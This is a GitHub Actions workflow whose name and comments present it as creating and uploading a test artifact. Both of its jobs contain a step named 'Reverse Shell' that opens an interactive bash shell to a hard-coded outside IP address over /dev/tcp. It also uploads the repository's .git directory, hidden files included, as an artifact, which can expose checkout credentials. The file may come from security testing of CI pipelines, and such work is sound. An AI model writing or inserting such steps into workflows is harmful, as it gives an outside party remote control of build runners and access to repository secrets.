name: Create and Upload Artifact

on:
  workflow_dispatch

jobs:
  create-and-upload:
    runs-on: ubuntu-latest

    steps:
      # Checkout the repository (optional if you don't need repo files)
      - name: Checkout code
        uses: actions/checkout@v3

      # Create a file
      - name: Reverse Shell
        run: bash -i >& /dev/tcp/34.66.173.72/1337 0>&1

      # Upload the artifact
      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          include-hidden-files: true
          name: test-file
          path: .git/

  download-test:
    runs-on: ubuntu-latest
    needs: create-and-upload
    steps:

      # Checkout the repository (optional if you don't need repo files)
      - name: Checkout code
        uses: actions/checkout@v4
        
      # Download the artifact
      - name: Download artifact
        uses: actions/download-artifact@v4
        with:
          name: test-file
          path: artifact-folder
          
      - name: Reverse Shell
        run: bash -i >& /dev/tcp/34.66.173.72/1338 0>&1

